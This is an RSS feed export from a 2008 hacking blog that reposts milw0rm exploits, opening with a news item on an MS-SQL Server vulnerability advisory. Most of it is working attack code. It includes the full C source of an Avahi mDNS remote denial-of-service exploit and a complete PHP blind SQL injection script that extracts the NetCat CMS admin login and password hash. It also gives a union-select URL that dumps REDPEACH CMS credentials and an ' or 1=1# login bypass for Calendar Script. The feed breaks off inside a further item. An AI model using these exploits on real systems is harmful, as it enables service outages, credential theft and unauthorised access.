<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>h4xx0rs</title>
	<atom:link href="http://h4xx0rs.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://h4xx0rs.wordpress.com</link>
	<description>Security Team</description>
	<lastBuildDate>Wed, 24 Dec 2008 09:48:50 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='h4xx0rs.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>h4xx0rs</title>
		<link>http://h4xx0rs.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://h4xx0rs.wordpress.com/osd.xml" title="h4xx0rs" />
	<atom:link rel='hub' href='http://h4xx0rs.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Microsoft Warns of Serious MS-SQL 2000 &amp; 2005 Vulnerability</title>
		<link>http://h4xx0rs.wordpress.com/2008/12/24/microsoft-warns-of-serious-ms-sql-2000-2005-vulnerability/</link>
		<comments>http://h4xx0rs.wordpress.com/2008/12/24/microsoft-warns-of-serious-ms-sql-2000-2005-vulnerability/#comments</comments>
		<pubDate>Wed, 24 Dec 2008 09:48:50 +0000</pubDate>
		<dc:creator>x9169</dc:creator>
				<category><![CDATA[news]]></category>

		<guid isPermaLink="false">http://h4xx0rs.wordpress.com/2008/12/24/microsoft-warns-of-serious-ms-sql-2000-2005-vulnerability/</guid>
		<description><![CDATA[Another big flaw has been discovered in Microsoft software just a few days after they broke their patch cycle to issue a patch for the IE bug that allowed remote code execution. This time however it doesn’t really effect home users or the general consumer, it’s a more specific server side vulnerability affecting Microsoft SQL [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=17&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Another big flaw has been discovered in Microsoft software just a few days after they <a href="http://www.darknet.org.uk/2008/12/microsoft-breaks-patch-cycle-to-issue-ie-patch/">broke their patch cycle to issue a patch</a> for the <a href="http://www.darknet.org.uk/2008/12/ie7-exploit-also-affects-ie5-ie6-and-ie8-more-users-in-trouble/">IE bug that allowed remote code execution</a>.</p>
<p>This time however it doesn’t really effect home users or the general consumer, it’s a more specific server side vulnerability affecting Microsoft SQL Server 2000 and 2005 versions. It seems pretty serious though as it also appears that this vulnerability if exploited properly could lead to remote code execution.</p>
<p><!--adsense#New468--></p>
<blockquote><p>Just days after patching a critical flaw in its Internet Explorer browser, Microsoft is now warning users of a serious bug in its SQL Server database software. Microsoft issued a security advisory late Monday, saying that the bug could be exploited to run unauthorized software on systems running versions of Microsoft SQL Server 2000 and SQL Server 2005.</p>
<p>Attack code that exploits the bug has been published, but Microsoft said that it has not yet seen this code used in online attacks. Database servers could be attacked using this flaw if the criminals somehow found a way to log onto the system, and Web applications that suffered from relatively common SQL injection bugs could be used as stepping stones to attack the back-end database, Microsoft said.</p>
<p>Desktop users running the Microsoft SQL Server 2000 Desktop Engine or SQL Server 2005 Express could be at risk in some circumstances, Microsoft said.</p></blockquote>
<p>Again I wonder how far behind the curve Microsoft is with this? Usually these kind of bugs have been discovered by the more malicious parties way before Microsoft has any idea that their software is vulnerable.</p>
<p>It claims that the code hasn’t been used in online attacks, but honestly if it was used well by a smart party who would even know? <a href="http://www.darknet.org.uk/tag/sql-injection">SQL injection</a> could lead to this attack being executed and the code is published online so I find it unlikely that it hasn’t been used.</p>
<p><!--adsense#New468--></p>
<blockquote><p>The bug lies in a stored procedure called “sp_replwritetovarbin,” which is used by Microsoft’s software when it replicates database transactions. It was publicly disclosed on December 9 by SEC Consult Vulnerability Lab, which said it had notified Microsoft of the issue in April.</p>
<p>“Systems with Microsoft SQL Server 7.0 Service Pack 4, Microsoft SQL Server 2005 Service Pack 3, and Microsoft SQL Server 2008 are not affected by this issue,” Microsoft said in its advisory.</p>
<p>This is the third serious bug in Microsoft’s software to be disclosed in the past month, but it is unlikely to be used in widespread attacks, according to Marc Maiffret, director of professional services, with The DigiTrust Group, a security consulting firm. “It is rather low risk given other vulnerabilities that exist,” he said via instant message. “There are a lot of better ways to currently compromise windows systems.”</p></blockquote>
<p>The bug was discovered by someone in April this year, so that’s at least 7 months someone has known about it..but only know when the vendor discloses it then Microsoft chooses to say something about it.</p>
<p>It is a fairly low risk vulnerability due to the requirements needed to execute it effectively, but still it’s another chink in the Microsoft armour to add to the (long long) list.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4xx0rs.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4xx0rs.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4xx0rs.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4xx0rs.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4xx0rs.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4xx0rs.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4xx0rs.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4xx0rs.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4xx0rs.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4xx0rs.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4xx0rs.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4xx0rs.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4xx0rs.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4xx0rs.wordpress.com/17/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=17&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4xx0rs.wordpress.com/2008/12/24/microsoft-warns-of-serious-ms-sql-2000-2005-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ba556f2e82fc5d2fd2c8c9d0e3e25b2?s=96&#38;d=identicon" medium="image">
			<media:title type="html">x9169</media:title>
		</media:content>
	</item>
		<item>
		<title>Avahi &lt; 0.6.24 (mDNS Daemon) Remote Denial of Service Exploit</title>
		<link>http://h4xx0rs.wordpress.com/2008/12/24/avahi-0624-mdns-daemon-remote-denial-of-service-exploit/</link>
		<comments>http://h4xx0rs.wordpress.com/2008/12/24/avahi-0624-mdns-daemon-remote-denial-of-service-exploit/#comments</comments>
		<pubDate>Wed, 24 Dec 2008 09:33:51 +0000</pubDate>
		<dc:creator>x9169</dc:creator>
				<category><![CDATA[rem0te]]></category>

		<guid isPermaLink="false">http://h4xx0rs.wordpress.com/2008/12/24/avahi-0624-mdns-daemon-remote-denial-of-service-exploit/</guid>
		<description><![CDATA[/* * cve-2008-5081.c * * Avahi mDNS Daemon Remote DoS &#60; 0.6.24 * Jon Oberheide &#60;jon@oberheide.org&#62; * http://jon.oberheide.org * * Usage: * * gcc cve-2008-5081.c -ldnet -o cve-2008-5081 * ./cve-2008-5081 1.2.3.4 * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5081 * * Crafted mDNS packet with source port 0 can cause avahi-daemon * to abort() due to failed [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=16&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<pre>/*
 * cve-2008-5081.c
 *
 * Avahi mDNS Daemon Remote DoS &lt; 0.6.24
 * Jon Oberheide &lt;jon@oberheide.org&gt;
 * http://jon.oberheide.org
 *
 * Usage:
 *
 *   gcc cve-2008-5081.c -ldnet -o cve-2008-5081
 *   ./cve-2008-5081 1.2.3.4
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5081
 *
 *   Crafted mDNS packet with source port 0 can cause avahi-daemon
 *   to abort() due to failed assertion assert(port &gt; 0); in
 *   originates_from_local_legacy_unicast_socket() function in
 *   avahi-core/server.c.
 *
 */

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;dnet.h&gt;

int
main(int argc, char **argv)
{
    ip_t *sock;
    intf_t *intf;
    struct addr dst;
    struct ip_hdr *ip;
    struct udp_hdr *udp;
    struct intf_entry entry;
    int len = IP_HDR_LEN + UDP_HDR_LEN;
    char buf[len];

    if (argc &lt; 2 || addr_aton(argv[1], &amp;dst)) {
        printf("error: please specify a target ip address\n");
        return 1;
    }

    memset(buf, 0, sizeof(buf));

    ip = (struct ip_hdr *) buf;
    ip-&gt;ip_v = 4;
    ip-&gt;ip_hl = 5;
    ip-&gt;ip_tos = 0;
    ip-&gt;ip_off = 0;
    ip-&gt;ip_sum = 0;
    ip-&gt;ip_ttl = IP_TTL_MAX;
    ip-&gt;ip_p = IP_PROTO_UDP;
    ip-&gt;ip_id = htons(0xdead);
    ip-&gt;ip_len = htons(len);

    udp = (struct udp_hdr *) (buf + IP_HDR_LEN);

    udp-&gt;uh_sum = 0;
    udp-&gt;uh_sport = htons(0);
    udp-&gt;uh_dport = htons(5353);
    udp-&gt;uh_ulen = htons(UDP_HDR_LEN);

    intf = intf_open();
    intf_get_dst(intf, &amp;entry, &amp;dst);
    intf_close(intf);

    ip-&gt;ip_src = entry.intf_addr.addr_ip;
    ip-&gt;ip_dst = dst.addr_ip;
    ip_checksum(buf, len);

    sock = ip_open();
    if (!sock) {
        printf("error: root privileges needed for raw socket\n");
        return 1;
    }
    ip_send(sock, buf, len);
    ip_close(sock);

    return 0;
}

// milw0rm.com [2008-12-19]</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4xx0rs.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4xx0rs.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4xx0rs.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4xx0rs.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4xx0rs.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4xx0rs.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4xx0rs.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4xx0rs.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4xx0rs.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4xx0rs.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4xx0rs.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4xx0rs.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4xx0rs.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4xx0rs.wordpress.com/16/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=16&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4xx0rs.wordpress.com/2008/12/24/avahi-0624-mdns-daemon-remote-denial-of-service-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ba556f2e82fc5d2fd2c8c9d0e3e25b2?s=96&#38;d=identicon" medium="image">
			<media:title type="html">x9169</media:title>
		</media:content>
	</item>
		<item>
		<title>CMS NetCat 3.12 (password_recovery.php) Blind SQL Injection Exploit</title>
		<link>http://h4xx0rs.wordpress.com/2008/12/24/cms-netcat-312-password_recoveryphp-blind-sql-injection-exploit/</link>
		<comments>http://h4xx0rs.wordpress.com/2008/12/24/cms-netcat-312-password_recoveryphp-blind-sql-injection-exploit/#comments</comments>
		<pubDate>Wed, 24 Dec 2008 09:32:41 +0000</pubDate>
		<dc:creator>x9169</dc:creator>
				<category><![CDATA[rem0te]]></category>

		<guid isPermaLink="false">http://h4xx0rs.wordpress.com/?p=14</guid>
		<description><![CDATA[&#60;? /* NetCat Blind SQL Injection exploit by s4avrd0w [s4avrd0w@p0c.ru] Versions affected 3.12 More info: http://www.netcat.ru/ * tested on version 3.12 usage: # ./NetCat_blind_SQL_exploit.php -s=NetCat_server -u=User_ID The options are required: -u The user identifier (number in table) -s Target for exploiting example: # ./NetCat_blind_SQL_exploit.php -s=http://localhost/netcat/ -u=2 [+] Phase 1 brute login. [+] Brute 1 symbol... [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=14&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<pre>&lt;?

/*
	NetCat Blind SQL Injection exploit by s4avrd0w [s4avrd0w@p0c.ru]
	Versions affected 3.12

	More info: http://www.netcat.ru/

	* tested on version 3.12

	usage: 

	# ./NetCat_blind_SQL_exploit.php -s=NetCat_server -u=User_ID

	The options are required:
	 -u The user identifier (number in table)
	 -s Target for exploiting

	example:

	# ./NetCat_blind_SQL_exploit.php -s=http://localhost/netcat/ -u=2

	[+] Phase 1 brute login.
	[+] Brute 1 symbol...
	...........a
	[+] Brute 2 symbol...
	..............d
	[+] Brute 3 symbol...
	.......................m
	[+] Brute 4 symbol...
	...................i
	[+] Brute 5 symbol...
	........................n
	[+] Brute 6 symbol...
	.....................................
	[+] Phase 1 successfully finished: admin
	[+] Phase 2 brute password-hash.
	[+] Brute 1 symbol...
	*
	[+] Brute 2 symbol...
	.0
	[+] Brute 3 symbol...
	.0
	[+] Brute N symbol...

	&lt;...&gt;

	[+] Brute 42 symbol...
	.....................................
	[+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9

	[+] Exploiting is finished successfully
	[+] Login - admin
	[+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9
	[+] Decrypt MySQL hash and login into NetCat CMS.

*/

function http_connect($query)
{

	global $server;

	$headers = array(
	    'User-Agent' =&gt; 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
	    'Referer' =&gt; $server
	);

	$res_http = new HttpRequest($server."modules/auth/password_recovery.php?=1".$query, HttpRequest::METH_GET);
	$res_http-&gt;addHeaders($headers);

	try {
		$response = $res_http-&gt;send()-&gt;getBody();

		if (eregi("page_header", $response))
		{
			return 1;
		}
		else
		{
			return 0;
		}

	} catch (HttpException $exception) {

		print "[-] Not connected";
		exit(0);

	}

}

function brute($User_id,$table)
{
	$ret_str = "";

	for ($i=1;$i&lt;43;$i++)
	{
		print "[+] Brute $i symbol...\n";

		for ($j=42;$j&lt;123;$j++)
		{
			$q = "'/**/OR/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$j,1,0)/*";

			if (http_connect($q))
			{
				$ret_str=$ret_str.chr($j);
				print chr($j)."\n";
				break;
			}
			print ".";

			if ($j == 57) $j = 96;
			if ($j == 42) $j = 47;

		}

		if ($j == 123) break;
	}

	return $ret_str;
}

function help_argc($script_name)
{
print "
usage:

# ./".$script_name." -s=NetCat_server -u=User_ID

The options are required:
 -u The user identifier (number in table)
 -s Target for exploiting

example:

# ./".$script_name." -s=http://localhost/netcat/ -u=1
[+] Phase 1 brute login.
[+] Brute 1 symbol...
..1
[+] Brute 2 symbol...
.....................................
[+] Phase 1 successfully finished: 1
[+] Phase 2 brute password-hash.
[+] Brute 1 symbol...
.....................................
[+] Phase 2 successfully finished:

[+] Exploiting is finished successfully
[+] Login - 1
[+] MySQL hash -
[+] You can login into NetCat CMS with the empty password
";
}

function successfully($login,$hash)
{
print "

[+] Exploiting is finished successfully
[+] Login - $login
[+] MySQL hash - $hash
";

if ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\n";
else print "[+] You can login into NetCat CMS with the empty password\n";

}

if (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
	help_argc($argv[0]);
	exit(0);
}
else
{
	$ARG = array();
	foreach ($argv as $arg) {
		if (strpos($arg, '-') === 0) {
			$key = substr($arg,1,1);
			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
		}
	}

	if ($ARG[s] &amp;&amp; $ARG[u])
	{
		$server = $ARG[s];
		$User_id = intval($ARG[u]);
		$User_id--;

		print "[+] Phase 1 brute login.\n";
		$login = brute($User_id,"Login");
		print "\n[+] Phase 1 successfully finished: $login\n";

		print "[+] Phase 2 brute password-hash.\n";
		$hash = brute($User_id,"Password");
		print "\n[+] Phase 2 successfully finished: $hash\n";

		successfully($login,$hash);
	}
	else
	{
		help_argc($argv[0]);
		exit(0);
	}

}

?&gt; 

# milw0rm.com [2008-12-23]</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4xx0rs.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4xx0rs.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4xx0rs.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4xx0rs.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4xx0rs.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4xx0rs.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4xx0rs.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4xx0rs.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4xx0rs.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4xx0rs.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4xx0rs.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4xx0rs.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4xx0rs.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4xx0rs.wordpress.com/14/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=14&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4xx0rs.wordpress.com/2008/12/24/cms-netcat-312-password_recoveryphp-blind-sql-injection-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ba556f2e82fc5d2fd2c8c9d0e3e25b2?s=96&#38;d=identicon" medium="image">
			<media:title type="html">x9169</media:title>
		</media:content>
	</item>
		<item>
		<title>REDPEACH CMS (zv) Remote SQL Injection Vulnerability</title>
		<link>http://h4xx0rs.wordpress.com/2008/12/24/redpeach-cms-zv-remote-sql-injection-vulnerability/</link>
		<comments>http://h4xx0rs.wordpress.com/2008/12/24/redpeach-cms-zv-remote-sql-injection-vulnerability/#comments</comments>
		<pubDate>Wed, 24 Dec 2008 09:31:50 +0000</pubDate>
		<dc:creator>x9169</dc:creator>
				<category><![CDATA[rem0te]]></category>

		<guid isPermaLink="false">http://h4xx0rs.wordpress.com/2008/12/24/redpeach-cms-zv-remote-sql-injection-vulnerability/</guid>
		<description><![CDATA[############################################################### # # REDPEACH CMS - SQL Injection Vulnerability # http://www.redpeach.de/ # # Vulnerability discovered by: Lidloses_Auge # Greetz to: -=Player=- , Suicide, g4ms3, enco, # Palme, GPM, karamble, Free-Hack # Date: 23.12.2008 # ############################################################### # # Admin Panel: [Target]/admin/login.php # Description: The Files "index.php" and "page.php" contain # vulnerable SQL Querys at the GET [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=13&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<pre>###############################################################
#
#           REDPEACH CMS - SQL Injection Vulnerability
#	    http://www.redpeach.de/
#
#      Vulnerability discovered by: Lidloses_Auge
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   Palme, GPM, karamble, Free-Hack
#      Date:                        23.12.2008
#
###############################################################
#
#      Admin Panel: [Target]/admin/login.php
#      Description: The Files "index.php" and "page.php" contain
#		    vulnerable SQL Querys at the GET Parameter "zv".
#		    In the most cases you need a table prefix, which
#		    is similar to the websites' name, so you can guess.
#		    After table prefix there's "_user".
#		    The important column names are "username" and "password".
#		    The number of columns is 8 almost everytime.
#
#      Example:     http://www.website.com/page.php?pageid=1&amp;zv=null+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8+from+website_user+limit+0,1/*
#
###############################################################

# milw0rm.com [2008-12-22]</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4xx0rs.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4xx0rs.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4xx0rs.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4xx0rs.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4xx0rs.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4xx0rs.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4xx0rs.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4xx0rs.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4xx0rs.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4xx0rs.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4xx0rs.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4xx0rs.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4xx0rs.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4xx0rs.wordpress.com/13/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=13&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4xx0rs.wordpress.com/2008/12/24/redpeach-cms-zv-remote-sql-injection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ba556f2e82fc5d2fd2c8c9d0e3e25b2?s=96&#38;d=identicon" medium="image">
			<media:title type="html">x9169</media:title>
		</media:content>
	</item>
		<item>
		<title>Calendar Script 1.1 (Auth Bypass) SQL Injection Vulnerability</title>
		<link>http://h4xx0rs.wordpress.com/2008/12/24/calendar-script-11-auth-bypass-sql-injection-vulnerability/</link>
		<comments>http://h4xx0rs.wordpress.com/2008/12/24/calendar-script-11-auth-bypass-sql-injection-vulnerability/#comments</comments>
		<pubDate>Wed, 24 Dec 2008 09:30:56 +0000</pubDate>
		<dc:creator>x9169</dc:creator>
				<category><![CDATA[web apps]]></category>

		<guid isPermaLink="false">http://h4xx0rs.wordpress.com/2008/12/24/calendar-script-11-auth-bypass-sql-injection-vulnerability/</guid>
		<description><![CDATA[----------------------------------------------------- Calendar Script v1.1 Admin Login Bypass Vulnerability ----------------------------------------------------- by athos - staker[at]hotmail[dot]it http://www.hotscripts.com/jump.php?listing_id=71365&#38;jump_type=1 File Vuln "index.php" (code details) ------------------------------------------------------------ 4. $action = $_POST['action']; 5. 6. switch($action) { 7. case 'login': 8. // login 9. $username = stripslashes(trim($_POST['username'])); 10. $password = sha1(stripslashes(trim($_POST['password']))); 11. 12. if(empty($username) &#124;&#124; empty($password)) { 13. // Stop, someone tried entering nothing [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=12&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<pre> -----------------------------------------------------
 Calendar Script v1.1 Admin Login Bypass Vulnerability
 -----------------------------------------------------
 by athos - staker[at]hotmail[dot]it
 http://www.hotscripts.com/jump.php?listing_id=71365&amp;jump_type=1

 File Vuln "index.php" (code details)

 ------------------------------------------------------------

 4.  $action = $_POST['action'];
 5.
 6.  switch($action) {
 7.  case 'login':
 8.  // login
 9.  $username = stripslashes(trim($_POST['username']));
 10. $password = sha1(stripslashes(trim($_POST['password'])));
 11.
 12. if(empty($username) || empty($password)) {
 13. // Stop, someone tried entering nothing into here
 14. // Show an error.
 15. $loginMsg = 'You must enter a username and password';
 16. } else {
 17. // The input seems to be ok, check it against the database.
 18. $checkDetails = mysql_query("SELECT id FROM user WHERE username='$username' AND password='$password' LIMIT 1", $conn);

 ------------------------------------------------------------

 Exploit

 http://[host]/[path]/index.php

 (Login) Username: ' or 1=1# &amp; Password: anything

 ------------------------------------------------------------

 Fix: $username = mysql_real_escape_string($_POST['username']);

 Note: works regardless php.ini settings (str0ke =D)
       don't add me on msn messenger

 ------------------------------------------------------------

# milw0rm.com [2008-12-22]</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4xx0rs.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4xx0rs.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4xx0rs.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4xx0rs.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4xx0rs.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4xx0rs.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4xx0rs.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4xx0rs.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4xx0rs.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4xx0rs.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4xx0rs.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4xx0rs.wordpress.com/12/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4xx0rs.wordpress.com/12/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4xx0rs.wordpress.com/12/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4xx0rs.wordpress.com&amp;blog=5943379&amp;post=12&amp;subd=h4xx0rs&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4xx0rs.wordpress.com/2008/12/24/calendar-script-11-auth-bypass-sql-injection-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/2ba556f2e82fc5d2fd2c8c9d0e3e25b2?s=96&#38;d=identicon" medium="image">
			<media:title type="html">x9169</media:title>
		</media:content>
	</item>
		<item>
		<title>Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin)</title>
		<link>http://h4xx0rs.wordpress.com/2008/12/23/psi-jabber-client-8010tcp-remote-denial-of-service-exploit-winlin/</link>
		<comments>http://h4xx0rs.wordpress.com/2008/12/23/psi-jabber-client-8010tcp-remote-denial-of-service-exploit-winlin/#comments</comments>
		<pubDate>Tue, 23 Dec 2008 23:02:28 +0000</pubDate>
		<dc:creator>x9169</dc:creator>
		
